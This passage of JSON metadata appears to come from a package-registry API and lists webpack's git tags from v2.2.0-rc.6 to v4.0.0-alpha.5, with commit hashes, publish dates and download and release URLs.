ebpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.